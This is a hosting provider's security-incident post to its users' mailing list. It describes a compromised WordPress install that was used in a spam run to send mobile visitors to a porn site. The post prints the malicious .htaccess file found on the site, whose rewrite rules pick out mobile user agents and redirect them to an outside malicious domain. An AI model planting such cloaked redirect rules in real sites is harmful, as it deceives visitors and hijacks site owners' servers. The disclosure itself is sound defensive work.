[bitfolk] Security incident: Wordpress install compromised a…

Top Page
Author: Andy Smith
Date:  
To: users
Subject: [bitfolk] Security incident: Wordpress install compromised and turned into redirect to porn site

Reply to this message
gpg: Signature made Tue Mar 5 19:23:45 2013 UTC
gpg: using DSA key 2099B64CBF15490B
gpg: Good signature from "Andy Smith <andy@strugglers.net>" [unknown]
gpg: aka "Andrew James Smith <andy@strugglers.net>" [unknown]
gpg: aka "Andy Smith (UKUUG) <andy.smith@ukuug.org>" [unknown]
gpg: aka "Andy Smith (BitFolk Ltd.) <andy@bitfolk.com>" [unknown]
gpg: aka "Andy Smith (Linux User Groups UK) <andy@lug.org.uk>" [unknown]
gpg: aka "Andy Smith (Cernio Technology Cooperative) <andy.smith@cernio.com>" [unknown]
Hi,

Yesterday we received numerous abuse reports regarding a web site
hosted at BitFolk being mentioned in an email spam run. The spam
email looked like this:

    http://pastie.org/private/vjxjhjkpfxqby0fkrv87oq


(http://[elided]/wp-content/themes/mantra/uploads/wps.php?v20120226
being the link that was hosted at BitFolk)

The link, when visited from a conventional browser, was a harmless
redirect to microsoft.com, however when visited from a mobile
browser redirected to a porn site.

The customer was contacted and their port 80 immediately firewalled
off.

Later the customer advised that they were unwilling to spend the
time to discover exactly how Wordpress had been compromised,
preferring instead to completely remove it.

The following .htaccess file was found in several places throughout
the wp-content directory:

    RewriteEngine On
    RewriteCond %{HTTP:X-WAP-PROFILE} !^$ [OR]
    RewriteCond %{HTTP_USER_AGENT}
    ^.*(Alcatel|Asus|Android|BlackBerry|Ericsson|Fly|Huawei|i-mate|iPAQ|iPhone|iPod|LG-|LGE-|MDS_|MOT-|Nokia|Palm|Panasonic|Pantech|Philips|Sagem|Samsung|Sharp|SIE-|Symbian|Vodafone|Voxtel|WebOS|Windows\s+CE|ZTE-|Zune).*$
    [NC,OR]
    RewriteCond %{HTTP_ACCEPT} application/vnd.wap.xhtml\+xml [NC,OR]
    RewriteCond %{HTTP_ACCEPT} text/vnd.wap.wml [NC]
    RewriteRule ^(.*) http://crzyluxtds.in/go.php?sid=1 [L,R=302]


The customer says that no plugins were installed, so it must have
been a base Wordpress install that was compromised (may have been
out of date or installed incorrectly).

Cheers,
Andy

About this email:
https://tools.bitfolk.com/wiki/Security_incident_postings

--
http://bitfolk.com/ -- No-nonsense VPS hosting